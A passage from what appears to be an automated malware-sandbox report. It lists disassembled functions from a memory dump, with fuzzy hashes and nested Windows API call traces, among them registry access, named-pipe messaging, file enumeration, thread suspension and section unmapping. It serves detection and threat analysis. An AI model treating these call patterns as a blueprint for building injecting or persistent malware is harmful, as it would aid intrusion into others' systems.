    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
